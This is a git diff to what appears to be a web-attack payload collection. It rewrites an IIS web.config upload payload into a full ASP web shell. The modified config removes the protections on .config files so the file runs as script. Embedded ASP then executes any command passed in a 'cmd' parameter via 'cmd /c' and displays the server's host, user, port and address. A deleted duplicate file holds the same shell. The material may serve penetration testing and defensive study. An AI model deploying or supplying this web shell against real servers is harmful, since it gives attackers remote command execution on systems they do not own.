diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
index c14f37e..6e02a37 100644
--- a/Upload Insecure Files/Configuration IIS web.config/web.config	
+++ b/Upload Insecure Files/Configuration IIS web.config/web.config	
@@ -1,8 +1,8 @@
-<?xml version="1.0″ encoding="UTF-8″?>
+<?xml version="1.0" encoding="UTF-8"?>
 <configuration>
    <system.webServer>
       <handlers accessPolicy="Read, Script, Write">
-         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
       </handlers>
       <security>
          <requestFiltering>
@@ -15,20 +15,51 @@
          </requestFiltering>
       </security>
    </system.webServer>
-   <appSettings>
-</appSettings>
 </configuration>
-<!–
-<% Response.write("-"&"->")
-Response.write("</p>
-<pre>")</p>
-<p>Set wShell1 = CreateObject("WScript.Shell")
-Set cmd1 = wShell1.Exec("whoami")
-output1 = cmd1.StdOut.Readall()
-set cmd1 = nothing: Set wShell1 = nothing</p>
-<p>Response.write(output1)
-Response.write("</pre>
-<p><!-"&"-") %>
-–>
+<!--
+<% Response.write("-"&"->")%>
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
 
-<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
\ No newline at end of file
+Function getCommandOutput(theCommand)
+    Dim objShell, objCmdExec
+    Set objShell = CreateObject("WScript.Shell")
+    Set objCmdExec = objshell.exec(thecommand)
+
+    getCommandOutput = objCmdExec.StdOut.ReadAll
+end Function
+%>
+
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<%Response.Write(Request.ServerVariables("server_name"))%>
+<p>
+<b>The server's port:</b>
+<%Response.Write(Request.ServerVariables("server_port"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("server_software"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
+<% szCMD = request("cmd")
+thisDir = getCommandOutput("cmd /c" & szCMD)
+Response.Write(thisDir)%>
+</p>
+<br>
+</BODY>
+
+
+
+<%Response.write("<!-"&"-") %>
+-->
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config
deleted file mode 100644
index 6e02a37..0000000
--- a/Upload Insecure Files/Configuration IIS web.config/web.web.config	
+++ /dev/null
@@ -1,65 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<configuration>
-   <system.webServer>
-      <handlers accessPolicy="Read, Script, Write">
-         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
-      </handlers>
-      <security>
-         <requestFiltering>
-            <fileExtensions>
-               <remove fileExtension=".config" />
-            </fileExtensions>
-            <hiddenSegments>
-               <remove segment="web.config" />
-            </hiddenSegments>
-         </requestFiltering>
-      </security>
-   </system.webServer>
-</configuration>
-<!--
-<% Response.write("-"&"->")%>
-<%
-Set oScript = Server.CreateObject("WSCRIPT.SHELL")
-Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
-Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-
-Function getCommandOutput(theCommand)
-    Dim objShell, objCmdExec
-    Set objShell = CreateObject("WScript.Shell")
-    Set objCmdExec = objshell.exec(thecommand)
-
-    getCommandOutput = objCmdExec.StdOut.ReadAll
-end Function
-%>
-
-<BODY>
-<FORM action="" method="GET">
-<input type="text" name="cmd" size=45 value="<%= szCMD %>">
-<input type="submit" value="Run">
-</FORM>
-
-<PRE>
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-<%Response.Write(Request.ServerVariables("server_name"))%>
-<p>
-<b>The server's port:</b>
-<%Response.Write(Request.ServerVariables("server_port"))%>
-</p>
-<p>
-<b>The server's software:</b>
-<%Response.Write(Request.ServerVariables("server_software"))%>
-</p>
-<p>
-<b>The server's software:</b>
-<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
-<% szCMD = request("cmd")
-thisDir = getCommandOutput("cmd /c" & szCMD)
-Response.Write(thisDir)%>
-</p>
-<br>
-</BODY>
-
-
-
-<%Response.write("<!-"&"-") %>
--->